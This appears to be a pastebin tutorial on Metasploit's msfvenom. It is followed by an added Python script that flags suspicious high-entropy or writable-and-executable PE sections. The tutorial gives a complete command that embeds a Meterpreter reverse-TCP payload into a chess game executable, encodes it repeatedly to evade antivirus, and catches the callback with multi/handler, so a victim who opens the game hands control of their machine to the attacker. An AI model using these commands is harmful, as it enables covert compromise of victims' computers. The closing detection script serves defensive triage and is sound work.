SH1NU11b1

msvenom

Feb 11th, 2015
msf > msfvenom


Encoders are the various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Metasploit has numerous encoding schemes, and we can look at these by typing:

msf > msfvenom -l encoders


Step 4: View the Payload Options

We can use msfvenom to check the options that we need to set for any payload, similar to "show options" in the Metasploit console. The command to check any payload's options is:

msf > msfvenom -p <payload name> -o

So, if we want to check the options for the windows/meterpreter/reverse_tcp payload, we simply type:

msf > msfvenom -p windows/meterpreter/reverse_tcp -o


Step 5: Create a Custom Windows Executable

Now, let's create a custom Windows executable with a custom template. Although we can create a payload without a custom template, we have a better chance of getting past security devices and AV if we use a custom template. In this case, we will use a chess game named "chess.exe." The idea here is that we will embed the meterpreter payload into the chess game and then, when the victim opens the game to play chess, it will open a meterpreter session on our system.

I have placed the chess game in the /usr/share directory.

To create a malicious executable with the windows/meterpreter/reverse_tcp payload embedded inside, we simply type:

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your local IP> LPORT=<whatever port you want to listen on> -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe > chess.exe


-p windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-i 200 represents the number of encoding iterations
-f exe designates we want to create an executable (.exe)
chess.exe designates the name of the file created


When the victim clicks on the chess.exe file, the meterpreter payload will be activated and will look to make a connection back to your system (LHOST). For the connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection.

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
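From the defender's side, an executable built the way described above (a payload re-encoded many times and grafted into a template binary) tends to leave a section whose raw bytes are near-random and, in many cases, one that is mapped both writable and executable. The following script is an added illustration of that triage heuristic; it is not part of the original paste and not a Metasploit component. The PE image it scans is constructed in memory (two sections, no optional header) so the check runs offline, and the 7.0-bit entropy threshold is an assumed tuning value, not a standard.

```python
"""Heuristic PE section scanner (added example, not from the original paste).

Flags sections that are writable+executable or whose raw data has Shannon
entropy above a threshold, two traits that encoded payload stubs commonly
show.  The sample PE is constructed below; no file on disk is read.
"""
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (name, characteristics, raw_bytes) for each section header."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                  # COFF file header
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    sec_off = coff + 20 + opt_size                       # first section header
    sections = []
    for i in range(num_sections):
        hdr = pe[sec_off + 40 * i: sec_off + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
        chars, = struct.unpack_from("<I", hdr, 36)
        sections.append((name, chars, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def suspicious_sections(pe: bytes, entropy_threshold: float = 7.0):
    """List of (section name, reasons) for sections worth a closer look."""
    findings = []
    for name, chars, data in parse_sections(pe):
        reasons = []
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable+executable")
        ent = shannon_entropy(data)
        if ent > entropy_threshold:
            reasons.append(f"entropy {ent:.2f}")
        if reasons:
            findings.append((name, reasons))
    return findings


def build_sample_pe() -> bytes:
    """Constructed two-section PE: a plain .text and a random RWX stub."""
    rng = random.Random(1)
    text = bytes([0x90] * 2000 + [0xC3] * 48)                # low entropy
    blob = bytes(rng.getrandbits(8) for _ in range(4096))     # near-random

    def sec_hdr(name, vaddr, data, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(data), vaddr,
                           len(data), ptr, 0, 0, 0, 0, chars)

    text_ptr = 0x200
    blob_ptr = text_ptr + ((len(text) + 0x1FF) // 0x200) * 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)
    hdrs = sec_hdr(b".text", 0x1000, text, text_ptr, 0x60000020)  # code, R+X
    hdrs += sec_hdr(b".stub", 0x2000, blob, blob_ptr, 0xE0000040)  # R+W+X
    image = bytearray(dos + coff + hdrs)
    image += b"\0" * (text_ptr - len(image)) + text
    image += b"\0" * (blob_ptr - len(image)) + blob
    return bytes(image)


if __name__ == "__main__":
    for name, reasons in suspicious_sections(build_sample_pe()):
        print(f"{name}: {', '.join(reasons)}")
```

Run against a real file by replacing `build_sample_pe()` with the bytes of the binary under review. Treat a hit as a reason to sandbox or inspect further rather than as a verdict: packers and legitimately compressed resources also produce high-entropy sections, so the heuristic is a triage filter, not a signature.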